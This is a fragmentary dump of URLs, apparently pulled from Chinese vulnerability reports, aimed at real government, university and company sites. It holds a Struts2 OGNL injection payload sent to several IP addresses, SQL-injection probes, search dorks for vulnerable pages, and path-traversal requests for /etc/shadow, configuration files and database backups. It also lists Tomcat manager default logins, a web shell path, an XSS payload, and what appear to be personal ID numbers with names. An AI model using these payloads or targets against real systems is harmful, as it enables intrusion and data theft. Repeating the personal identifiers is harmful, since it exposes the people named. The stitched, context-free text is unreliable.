http://60.173.113.172:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://218.22.93.234:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://218.23.185.20:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://60.172.0.38:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://220.180.184.66:1980/ahsffyww/ZXDefault2.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D inurl:/childcatalog/zxzxinfo.jsp?MailId= http://www.ahn4a.cn/main/model/childcatalog/zxzxinfo.jsp?MailId=49 http://www.sqlmap.org www.ahn4a.cn\session url:http://www.chinapanda.org.cn/gallery.php?id=140 http://www.czp.gov.cn/site/model/search.aspx?keyword=a http://www.cczdrc.gov.cn/Site/model/search.aspx?keyword=a&imageField.x=34&imageField.y=15 http://www.czkjllt.com/kczx/model/search.aspx?keyword=a http://www.czzwgk.gov.cn/web/searchResult.aspx?unit=&key=a%27%20and%201=1&scope=%E6%A0%87%E9%A2%98&begin_date_b=2013/8/13&end_date_b=2014/8/13&xxfl_id=&flagsimple= http://www.czsipo.gov.cn/Site/model/search.aspx?keyword=a http://www.czjrfw.com/List.aspx?kind=seach&keyword=a inurl:/comment_info.jsp?sslm= inurl:subject_info.jsp?up_lmbh= http://www.sxtsaj.com/comment_info.jsp?sslm=00205&xxbh=999999999 http://www.sqlmap.org inurl:company.php?cat_pid= inurl:honor.php?cat_id= inurl:video.php?cat_pid= inurl:event.php?cat_pid= inurl:media.php?cat_pid= inurl:research.php?cat_pid= http://www.anhuixinke.com/honor.php?cat_pid=2&cat_id=14&cat_flage=0 http://www.sqlmap.org www.anhuixinke.com\session http://scdm.cdu.edu.cn/zxzx.php?newsid=1048 inurl:/appellate/appellate.do inurl:tslb= http://www.hz12345.gov.cn/appellate/appellate.do?act=query&page=10&tslb http://www.sqlmap.org www.hz12345.gov.cn\session www.kuntairoyalhotel.com/saas/Cms/getInteraction/?client_account=bj_ktjh http://www.gzkfqjcy.gov.cn/siteserver/siteserver/CMS/console_tableMetadata.aspx?ENName=cms_Content&TableType=BackgroundContent http://www.gzkfqjcy.gov.cn/siteserver/siteserver/main.aspx http://www.gzkfqjcy.gov.cn/T_newss.aspx http://zp.xyzx5u.com/ http://zp.xyzx5u.com/Manager/login.aspx www.yaofang.cn了 http://sz.ahedu.gov.cn/ inurl:searchAll.action inurl:hbwz/wcms http://www.xf12333.cn/hbwz/wcms/searchAll.action?searchContent=a http://www.hbxgxc12333.gov.cn/hbwz/wcms/searchAll.action?_currpage=4&_pagelines=20&_rowcount=461 http://ss12333.com/hbwz/wcms/searchAll.action?_currpage=7&_pagelines=20&_rowcount=276 http://www.hbsyrss.gov.cn/hbwz/wcms/searchAll.action http://www.hb12333.com/hbwz/wcms/searchAll.action?COLLCC=2196715525&COLLCC=2347710469&_currpage=33&_pagelines=20&_rowcount=1640 http://www.hb.hrss.gov.cn/hbwz/wcms/searchAll.action http://hbxgal12333.gov.cn/hbwz/wcms/searchAll.action?_currpage=6&_pagelines=20&_rowcount=271 http://alrs.xicp.net/hbwz/wcms/searchAll.action http://www.ouyahuanyu.com/zhxx_list.asp?id=92 http://www.sxhdct.com/fuwu_list.asp?id=65 http://www.shanghaizhongmin.com/news_list.asp?id=58 http://www.dgsytz.com/fuwu_list.asp?id=55 http://www.whjcrh.com/fuwu_list.asp?id=56 http://www.sywssp.com/news_list.asp?id=54 http://www.sz-zdy.com/news_list.asp?id=57 http://www.njxietong.com/news_list.asp?id=59 http://www.ahxyqz.com/news_list.asp?id=66 http://www.jxrsq.com/news_list.asp?id=55 http://www.fjbjxy.com/news_list.asp?id=74 http://www.fjbjxy.com/news_list.asp?id=74 http://www.sdkunde.com/fuwu_list.asp?id=64 http://www.fs-guancheng.com/fuwu_list.asp?id=55 http://www.nbtfyy.com/fuwu_list.asp?id=59 http://www.sdbrg.com/fuwu_list.asp?id=69 http://www.slcxkj.com/fuwu_list.asp?id=59 http://www.cqydfl.net/rc_list.asp?id=4 http://www.tianyuemotor.com/news_list.asp?id=68 http://www.jinfenganxin.com/news_list.asp?id=74 http://www.bjfxnt.com/news_list.asp?id=57 http://www.jstzjf.com/news_list.asp?id=32 http://www.jymyms.com/news_list.asp?id=57 http://www.szhmsl.com/news_list.asp?id=58 http://www.jjhainiu.com/news_list.asp?id=57 http://www.dgytblg.com/news_list.asp?id=73 http://www.chuduhengkang.com/news_list.asp?id=32 http://www.zhonghuajiaji.com/new_list.asp?id=54 http://www.fjtlly.com/news_list.asp?id=73 http://www.jshdhn.com/news_list.asp?id=74 http://www.zzxyy8.com/news_list.asp?id=74 http://www.wandashiyou.com/news_list.asp?id=99 http://www.tjhrl.com/news_list.asp?id=69 http://www.scysjs.com/news_list.asp?id=32 http://www.shxzbz.com/news_list.asp?id=70 http://www.szhdmc.com/news_list.asp?id=55 http://www.szcszlkt.com/news_list.asp?id=55 http://jjytrade.com/news_list.asp?id=72 http://www.jyhongfa.com/news_list.asp?id=69 http://www.nckcxx.com/new_list.asp?id=86 http://www.yyjszj.com/fuwu_list.asp?id=66 jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page jsp:directive.page http://www.chinapnr.com/ http://www.chinapnr.com/.svn/entries http://v.youmi.cn/member/delNote/?id=1123 www.scycjy.gov.cn http://www.scycjy.gov.cn/upload_file/%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9%E8%88%B9%E5%9D%9A%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F/bakk/wwwroot/count/ipdata/ http://academy.yonyou.com/ http://academy.yonyou.com/News_1.aspx?newsid=58 http://academy.yonyou.com/News_1.aspx?newsid=58 http://academy.yonyou.com/News_1.aspx?newsid=58 http://see1.tongji.edu.cn/system/ http://dadm.imust.cn/manage/login.aspx http://alumni.imust.cn/manage/login.aspx http://x.x.x.x/seatListSelect.jsp http://x.x.x.x/ucstarMessage-list-new.jsp http://x.x.x.x/webcall/messageNoteAdd.jsp http://x.x.x.x/client-editAffiche.action http://x.x.x.x/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://180.169.69.174/ http://www.jluhp.edu.cn/Art_Show.php?id=562” inurl:Channel.Aspx?ChannelID= http://item.yhd.com/item/2243856 www.alipay.com,解释:注册阿里云邮箱后同时自动注册了支付宝,此漏洞便通过支付宝来实现。 http://www.konkamobile.com/Search.aspx?key=a http://www.kkcool.com/kkmobile/Graphics.asp?picstype_2=0103 http://www.kkcool.com/kkmobile/Graphics.asp?supportid=a http://www.ncinfo.gov.cn/Newsite/content_detail.asp?id=41925 http://ocp.naiep.org/login/toLogin.action http://www.dapu.com/passport-lost-2-EA5D9AF19D0101D010C9386569577D48.html http://www.dapu.com/passport-lost-2-EA5D9AF19D0101D010C9386569577D48.html http://113.140.0.50:6688/sxgd/uncheckedWebsiteList.do?charge=yes http://kled.bnu.edu.cn/ http://kled.bnu.eud.cn/admin/ http://kled.bnu.eud.cn/data/找到youwe1_ecnd.sql.txt这个数据库文件 http://kled.bnu.eud.cn/admin.php inurl:/model/TwoGradePage/CIntroduce.aspx?columnId= http://sys.zafu.edu.cn/dy/model/TwoGradePage/CIntroduce.aspx?columnId=8 http://www.sqlmap.org http://sys.zafu.edu.cn:80/dy/Error.htm http://jxt.cqedu.net/ http://wlp.loupan.com/tool/admin/login.php http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file= http://wooyun.org/bugs/wooyun-2010-065948 http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/home/cms61/tomcat6.0.33/webapps/cms/META-INF/context.xml http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/home/cufemysqlbak/cufecms6120140812.sql http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/etc/rsyncd.conf http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/etc/gpowersoft.scrt http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file= http://www.bucea.edu.cn/cms/web/downloadFiles.jsp?file=/home/gpower/webapps/cms/META-INF/context.xml http://www.bucea.edu.cn/cms/web/downloadFiles.jsp?file=/home/cms6_bak20140328.sql http://www.bucea.edu.cn/cms/web/downloadFiles.jsp?file=/home/gpower/webapps/cms20140328.tar.gz www.XXXXX.com?www.qq.com www.XXXXX.com#www.qq.com http://bbs.siteserver.cn/thread-34-825655.aspx#924485 javascript:alert(document.cookie) http://www.scjm.gov.cn:8080/gov/page/NewsQuery_n.jsp?ID=246 http://www.scfpym.gov.cn/scfpymlindao/zhize.asp?id=7 http://www.cdjt.gov.cn/list.jsp?type=1&bigClassID=9016118602159042431 http://www.scjgdx.gov.cn http://bbs.siteserver.cn/thread-34-825647.aspx http://ahanimal.ahmu.edu.cn/product_info.asp?id=54 http://www.zsfy.org/about.asp?a=9 http://www.whguhao.com/about.asp?id=1 http://www.jzhlib.com/duzhe.asp?Nclass=22 http://www.hfhydro.com/en/news_info.asp?id=172 http://www.cqzjwxxk.com/about.asp?a=4 http://www.mygpstimes.com/News_Show.asp?id=237&Nclass=17 http://www.spshbx.org.cn/main1.action http://www.spshbx.org.cn/one8.jsp http://www.sxprice.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://221.3.226.148/该站点也受影响。 http://www.cytvu.net/Admin/Login.aspx http://www.csagency.com.cn/C:/ http://demo.fwwbqy.fwmys.mofcom.gov.cn/login.html jdbc:mysql://210.25.0.85:3306/smp?useOldAliasMetadataBehavior=true http://124.238.218.223:81/ inurl:jeecms/ArtiSearch.do http://www.wwxzfw.gov.cn/jeecms/ArtiSearch.do?count=10&searchKey=a%27+and+1%3D1&chnlId= http://www.cnfamily.com/family/jeecms/ArtiSearch.do?count=10&searchKey=%C1%BD%BB%E1 http://www.qsng.cn/jeecms/ArtiSearch.do?searchKey=%CA%D3%C1%A6 http://www.gykj.gov.cn/jeecms/ArtiSearch.do http://www.szwzgs.gov.cn/JeecmsH/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.cnacce.org.cn/jeecms/ArtiSearch.do?count=10&searchKey=%D5%C2%B3%CC http://61.167.199.228/kejichu/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://nurse.nfyy.com/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://itrc.jju.edu.cn/situation_policy/jeecms/ArtiSearch.do?count=10&searchKey=%C1%BD%BB%E1 http://www.chnsys.com.cn/jeecms/ArtiSearch.do?count=10&searchKey= http://www.wzsng.com/jeecms/ArtiSearch.do http://en.hnist.cn/jeecms/ArtiSearch.do?count=10&searchKey=Search+here http://www.daligl.com:8069/jinye/jeecms/ArtiSearch.do?count=10&searchKey=%D7%A8%C2%F4%B5%EA http://www.nxmy.com/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.lxst.net/fiberlms/jeecms/ArtiSearch.do?count=10&searchKey=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C%E7%B4%A2%E5%86%85%E5%AE%B9&chnlId= http://www.qqtech.com/jeecms/ArtiSearch.do?count=30&searchKey=%D5%BE%C4%DA%CB%D1%CB%F7 http://www.tspec.cn/jeecms/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.cnbmtech.com/cms/jeecms/ArtiSearch.do?searchKey=%E6%90%9C%E7%B4%A2 http://www.junkai.net/cms/jeecms/ArtiSearch.do?count=10&searchKey=%C9%FA%CC%AC http://www.sportmonline.cn/TiCMS/jeecms/ArtiSearch.do?count=10&searchKey= http://www.qsnedu.com/jeecms/ArtiSearch.do http://www.yxren.net/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.ppack.net/cms/jeecms/ArtiSearch.do?count=15&searchKey= http://www.hohutest.com/jeecms/ArtiSearch.do?count=16&searchKey=%B9%A6%C4%DC%B2%E2%CA%D4 http://www.kangbtall.com/jeecms/ArtiSearch.do?count=10&searchKey=%BF%B9%B0%D7%CC%C0 http://www.ctctct.com/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.ahctc.com:8080/jyb/jeecms/ArtiSearch.do?count=10&searchKey=%E7%AB%99%E5%86%85%E5%85%A8%E6%96%87%E6%A3%80%E7%B4%A2%EF%BC%8C%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&chnlId= http://www.huaxiashangwu.com/alcase.aspx,有仅前两页就存在十余个有SQL注入漏洞的网站。 http://www.shupukang.com http://www.iest.zju.edu.cn/yanjiusuo.php?ncid=40 http://202.98.7.155/ http://202.98.7.155:9999/ http://202.98.7.155:9999/login.action http://202.98.7.155/inc/upload/1407951979.php http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd%26fstq%3D1%26from%3Dwebmap%26c%3D179%26pn%3D0%26rn%3D10%26wd%3D http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd&fstq=1&from=webmap&c=179&pn=0&rn=10&wd= http://www.rz.gov.cn/qysw/Search.asp?datetime=&Type=&title=%B2%E9+%D1%AF&txtitle=1 http://www.rz.gov.cn/database/Default.aspx http://www.gzlis.edu.cn/tszl/onews.asp?id=419 http://www.xhtjj.gov.cn/onews.asp?id=576 http://www.sxedu.gov.cn/XZSP/actinfo_list.asp?p_id=92 http://www.jhwczj.gov.cn/newsinfo.jsp?id=1081 http://www.ahjcy.gov.cn/jcy-news/newsinfo.jsp?id=16770 http://rd.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp http://kdd.xidian.edu.cn/nv/download.php?path=../../index.php http://youth.cau.edu.cn/ATTACHMENT/download.php?filepath=../pages/head.php http://youxiang.100tal.com/regmail/download.action?file=plugin/MacAddressViewer/MacAddressViewer.msi http://youxiang.100tal.com/regmail/download.action?file=index.jsp http://youxiang.100tal.com/regmail/download.action?file=/plugin/../../../../../../etc/shadow http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/web.xml http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/config/core/applicationContext.xml http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/datasource.properties http://youxiang.100tal.com/regmail/download.action?file=/plugin/..//WEB-INF/classes/prop.properties jdbc:mysql://192.168.1.111:3409/regmail?zeroDateTimeBehavior=convertToNull&characterEncoding=UTF-8 http://oas.xueersi.org/ http://tieba.baidu.com/mo/q/bawuteamadd?fn=[0]&fid=[1]&team_un=[2]&type=[3 http://yingxin.ncepu.edu.cn/bulletinList.jsp?groupId=6 inurl:/ws2004/ http://www.gsfzb.gov.cn http://202.100.93.105:9090/zjgl/publicQueryCard.action http://www.sinsiu.com/ http://www.hkqx.gov.cn/admin/index.aspx http://58.215.180.214:8080/index.jspx?activedId=1&version=0 http://image.nankai.edu.cn http://image.nankai.edu.cn/images.php?im_id=243 http://211.151.9.15/balance/showConsole.action http://sectest.sinaapp.com/file_get_content.php?url=http://211.151.9.15/balance/showConsole.action http://202.204.115.59/resource/index/index.jsp http://digi.daqi.com/cgi-bin/chanpin/digi/products.cgi?kid=100000000& http://125.88.33.144/ http://58.248.56.79/cswx/wxbindform/joinClub.wx?timestamp=1407974396&wxid=oer35Pv5g-rHZav-2XNdRnE8kaFw&nonce=1910685851&signature=10c4b61377c2935ffede8968bf69704b188c5050 userId:oer35PjwP-boBLqm-zGBgLYNJzx0 tokenId:5d648ff09cdbef58 tokenId:175fdddc0256244d certId:210521198101160420 certid:440183198210056139,name:朱泽铭 certid:420116199611210046,name:李玲 certId:210106197902210328,name:王丹 https://221.224.13.120 www.sysghcw.com http://sns.wasu.cn/zfq/articledetail.aspx?id=246 http://60.247.8.69:7001/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/jsp/connector http://photo.hb.vnet.cn/SearchComposation.aspx?new=news&key=1 http://target:8735/tool/#upload http://target:8735/api/replypic http://www.hnwish.cn/case/jyal/ http://www.hncatv.cc/setup/ http://www.cstjb.com/setup/ http://www.cs48.com/setup/ http://www.hntbt.org.cn:8080/setup/ http://csxyz.com/setup/ http://web.api.115.com/files/download?pickcode=ew8qbpcb7dqndzfuk http://www.izhancms.com/ http://b2b.fdkjgz.com/admin/Login.aspx http://daolicloud.com/ http://124.202.141.72/ http://211.103.250.141:8081/ url:http://leleshan.leyou.com.cn/specialitem.php?scheduleid=408 http://leleshan.leyou.com.cn/specialitem.php?scheduleid=408 http://119.84.63.66/Conf/jsp/main/mainAction.do http://www.sxqxjyj.com/tools/vote.php?action=show&pollid=8 http://xashanhe.com/tools/vote.php?action=show&pollid=8 http://www.shenyie.com/tools/vote.php?action=show&pollid=8 http://hswuzhou.com//tools/vote.php?action=show&pollid=8 http://www.magicwinmail.com/success.php http://demo.magicwinmail.com:6080/ http://bbs.gexia.com http://bbs.siteserver.cn/ http://61.141.236.40/ http://61.141.236.40/welcome.jsp http://61.141.236.40/manager/html http://spdb.9588.com/main/Home/LogIn www.hrbkx.org.cn(哈尔滨市科学技术协会) www.hrbsourcing.gov.cn(中国哈尔滨服务外包网) http://vip.eduu.com/event?channel=5 http://localhost/search.asp?keyword=[sqli]&up_down=up http://myportal.super8.com.cn/ url:http://125.69.65.54:80/manager/html user:admin pass:admin url:http://125.88.103.21:80/manager/html user:tomcat pass:tomcat http://b.chinacitywater.org/news_list.php?c=7 http://tang.csair.com http://tang.csair.com/public/contact.aspx http://www.hikvision.com/en/download_more.asp?id=1388(2014-07-08) http://so.imop.us/ http://58.18.4.40/UtilAction!returnPage.action http://58.18.4.40/ user:admin pass:admin url:http://58.18.4.40:80/manager/html user:admin pass:admin http://www.hbqgy.cn/files/newsDetail.jsp?ID=20131013012642 http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://www.ybgj6.com/&mailid=ZC1914-Ml6Iq47sTBv3YXYlydGLI48&spam=0 http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://www.jkbd1013.com/&mailid=ZC1914-Ml6Iq47sTBv3YXYlydGLI48&spam=0 http://*****/ http://blog.incloud.org.cn/ http://tishow.dota2.com.cn http://www.dota2bbs.org http://bbs.dota2.com.cn https://118.253.71.250/ https://118.253.71.225/ https://118.253.69.57/ http://118.253.68.112/ https://118.253.69.117/ https://118.253.66.53/ https://118.253.66.65/ http://wenku.baidu.com/link?url=pr9T46jChXOcQ4QmlAZEvU7f5mO_PUxY4h3Om9gUoaOkq2PiTYcdkwmW5MvsYJ3dWN-TaxjrsOjTT09CegWecmEoUdWJX-zY6rBkPShJXGi URL:http://www.kanbox.com/files/sendFileShareMail Method:POST filesize:336167 maillist:xxxxx@qq.com http://222.177.23.36:8080/index.do http://222.177.23.36:8080/load.do?infoId=35 http://www.chinac.com/Account/agentapply.html http://yp.zjnu.edu.cn/ypdt/index.asp http://yp.zjnu.net.cn/admin.asp http://www.ciscostation.com.cn/aboutView.jsp?id=29 http://www.csbidding.com/nhzb/ http://www.csbidding.com/invoker/JMXInvokerServlet http://www.csbidding.com/ www.csbidding.com http://news.xincheping.com/index.php?a=Proxy.getLeaveList&id=64282"eType=6 http://www.centit.com/ http://www.ldzsc.gov.cn/ http://218.92.49.74:8090/ganyunet/ http://218.92.50.139:8082/lygdhnet/ http://218.92.62.78/gnnet/ http://218.92.14.22/gynet/ http://61.132.0.36:8090/lygnet/ url:http://0531.118114.cn http://0531.118114.cn/qylist.jsp?page=16&FID=16&SID=65 http://0531.118114.cn/qylist.jsp?page=16&FID=16&SID=65 http://www.036.cn/index.action http://114.80.121.110:8990/login.do http://111.11.13.250/PTMS/getPass.asp?UID=1 http://111.11.13.250/dbBackup/download.asp?p=../&n=Web.config http://61.141.236.40/manager/status http://www.ccret.org.cn/zixundisplay.asp?id=307。刚才又看见个数据库,http://www.ccret.org.cn//data.mdb,10M多;这个是什么?http://www.ccret.org.cn/data.asp,乱码。也是数据库么? http://www.zzczj.gov.cn/Czgk.aspx?sel=7&iid=7980 http://www.nxczj.gov.cn/ZwgkShow.aspx?id=3&iid=1891 http://www.llygsn.gov.cn/news.aspx?fatherId=110309 http://www.dtfdpx.com/base.asp?ScClassid=522 http://www.zzhsd.com/tanchu.asp?articleid=7 http://www.zzsgzc.com/base.asp?ScClassid=513 http://www.zzsmwc.com/base.asp?scclassid=513 http://www.crtsg.cn/leftRczp.aspx?fatherId=110706 http://www.loongrise.com/base.asp?scclassid=507 http://www.vasee.com/group/view/bbs/listBbs.jsp?groupid=ff808081355fdcb8013579b528870583&categoryid=1000 http://www.vasee.com/group/view/bbs/listBbs.jsp?groupid=ff808081355fdcb8013579b528870583&categoryid=1000的categoryid参数位置也存在盲注。 http://www.vasee.com/group/view/user/userpage.jsp?groupid=ff808081355fdcb8013579b528870583&id=ff80808144cdf6cc0145356c6a752b3f&s=a1 http://xiaoyou.cup.edu.cn/client/leaveMessage.aspx?id=242 url:http://www.18bg.com/explore/ www.18bg.com/user/staff/getlist/?ipage=1&deptid=0&group=0&staffname=%25 www.18bg.com/user/staff/getlist/?ipage=1&deptid=0&group=0&staffname=%25 http://demo.acsoft.com.cn/default.aspx http://bbs.dianjian.net/ http://gd.189.cn/dwr/exec/kdxy2012Helper.checkIsExistCustNo.dwr http://gd.189.cn/internet/kdxy/index.html?=yhzq http://gd.189.cn/dwr/exec/kdxy2012Helper.checkIsExistCustNo.dwr http://nisc.ccnu.edu.cn/error.asp?fid=9&sid=40” http://beijing.baixing.com/m/oz/login www.baixing.com/weishop/u113051581.html http://beijing.baixing.com/m/shoujihaoma/a393718461.html?postSuccess=1 http://www.yijieoa.com http://www.yijieoa.com/news/Website/shtml/T-8.htm?id=2 http://42.62.65.147:8089/ http://42.62.65.147:8089/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml http://bridge.tongji.edu.cn/dama.asp http://124.128.202.20:7001/inspection) http://www.izhancms.com/ http://demo8.izhancms.com/ http://www.189.cn/zqbiz/login.jspl http://cbs.nsa.gov.cn/serverpages/searchList.jsp?keyWord=88952634&keyType=dataTitle http://gjdx.sx.118114.cn/Hangup_Desk/business/loginAction.action http://58.221.185.221:88/ http://blog.csdn.net/hssdw25172008/article/details/8729469 http://www.chanjet.com/workbench/card http://www.uu.com.cn/user/st#user.st/user.photo http://dev.chanjet.com/user/000000000000000000031401 http://wpzs.chanjet.com/index.html#Setting/photo http://ccpup.chanjet.com/upindex.html# http://www.uu.com.cn/user/st#user.st/user.photo/ http://dg.uninx.com:8481/dgpt/adshow.php?shopid=4 http://dg.uninx.com:8481/cms/cms_iindex.php http://goucai.touzhu.cn/acthelp/show_help.php?id=52 http://goucai.touzhu.cn/inc/ http://goucai.touzhu.cn/session/ http://goucai.touzhu.cn/php.php http://fcm.games.sina.com.cn/fcm.html http://welcome.bupt.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe23&bulletinId=7e177275-1235-11e4-acdb-2bc35b0b6e58 http://sppm.bupt.edu.cn/show_news.asp?id=xx http://sppm.bupt.edu.cn/about.asp?id=xx http://sppm.bupt.edu.cn/show_edu1.asp?id=xx http://sppm.bupt.edu.cn/show_edu2.asp?id=xx http://sppm.bupt.edu.cn/show_temp.asp?id=xx http://sppm.bupt.edu.cn/show_MPA.asp?id=xx http://sppm.bupt.edu.cn/show_students.asp?id=xx http://sppm.bupt.edu.cn/search.asp?keyword=1&x=11&y=16 http://sppm.bupt.edu.cn/system_admin/index.asp http://sppm.bupt.edu.cn/system_admin2/index.asp http://meercin.bupt.edu.cn http://ts.oooxm.com http://www.clt.com.cn/search.jspa?txt=xxx http://220.248.202.146/trans/sm/login.asp http://www.shuanghui.net/shsk/spider%20Php%20shell.php http://www.jx.10086.cn/jxzone/index.do inurl:newsDetail.do?newsId http://www.xmfls.net/list!newsDetail.do?newsId=3638 http://lianhua.xmedu.cn/list!newsDetail.do?newsId=1520&name=&id=1 http://www.xmxdzx.com/list!newsDetail.do?newsId=1343&name=&id=1 http://www.xmhmxx.com/list!newsDetail.do?newsId=20549&id=3&schoolCode=001245 http://www.tayz.cn/list!newsDetail.do?newsId=1950 http://www.xmhcxx.net/list!newsDetail.do?newsId=670&id=122&schoolCode=001245 http://www.jmqsng.com/list!newsDetail.do?newsId=891 http://218.5.65.158/list!newsDetail.do?newsId=4870&id=212&schoolCode=0208122 http://www.118100.cn/kalaok/2014/vote.jsp?city=dongguan&match_group=baby&p=3 http://wooyun.eu5.org/upload/ http://down.qibosoft.com/down.php?v=b2b http://202.108.33.137/dama.asp www.eetop.cn百万级用户大型网站,已经联系管理员修复了,苦于提交的几个漏洞都没有获得邀请码,不得不用之前的存货再提交下。。。 http://casdu.cn http://www.nkbbs.info/ http://www.exjtu.com/ http://bbs.e23.cn/ http://tvs.tcl.com/admin/tclservice/webedior/admin/login.aspx http://www.maticsoft.com/shop.aspx http://shop2.maticsoft.cn/ http://shop2.maticsoft.cn/ueditor/net/imageDel.ashx?action=del&fileName=/目录/文件 http://shop2.maticsoft.cn/ueditor/net/imageDel.ashx?action=del&fileName=/Upload/Shop/Images/ProductThumbs/20131216/T394X510_201312161156366507813.jpg http://jpk.sicnu.edu.cn/viewdocT.asp?id=313 http://fgc.sicnu.edu.cn/sys_dwhz.asp?boardid=7 http://mail.rails.cn/nsmail/?_task=mail http://www.openwbs.com)企业建站系统,是一种全新企业建站和企业电商系统;定位于高端的企业网站建设、企业电子商务系统、企业会员管理和门户网站建设的CMS建站平台;OpenWBS功能模块非常丰富,可随意组合,用户在短时间内即可迅速架设属于自己的企业网站、电子商务网站、外贸网站、资讯门户和博客等各种类型网站,轻松生成功能强大和个性化的精美网站。 http://www.openwbs.com/ow-api/Cmd.asp http://bbs.rednet.cn/static/image/common/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://www.capub.cn:8888/ http://www.capub.cn:8888/jmx-console/ http://www.capub.cn:8888/status?full=true http://www.timber2005.com/ http://exam1.timber2005.com http://app.kekenet.com/readme.txt http://scms.swjoy.com/back/login/logout.htm http://www.swjoy.com/ http://pay.hjsm.tom.com/360.php cn:8088分站大概有400w的数据。 cn:8088这个分站的管理员用户密码,但是登录不进去,网站可能有些问题,所以就没继续渗透了。 https://www.eteams.cn/login/demo https://www.eteams.cn/profile/summary/8005824116863355409.json?_=1408094249509 url:https://www.eteams.cn/base/employee/saveProperty.json http://211.144.119.200 http://www.justsy.com/的数据。 http://www.maticsoft.com/default.htm http://shop.maticsoft.com/ http://shop1.maticsoft.cn http://shop1.maticsoft.cn/Upload/AD/32/201306251608311275682.jpg http://121.17.126.70/index.php/Public/pro_login/username/lanke-matao/password/e10adc3949ba59abbe56e057f20f883e/city/%E8%A1%A1%E6%B0%B4 http://www.chysoft.net/case.asp http://183.61.183.189:81/ http://183.61.183.189:81/engine/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/jsp/connector http://183.61.183.189:81/UserFiles/File/jspx.jspx http://app.finance.china.com.cn/person/detail.php?id= http://www.timber2005.com/ http://exam1.timber2005.com/default.aspx http://www.tyky.com.cn/ http://oa.lygzj.gov.cn/manager/html http://tuanwei.hbu.edu.cn/ 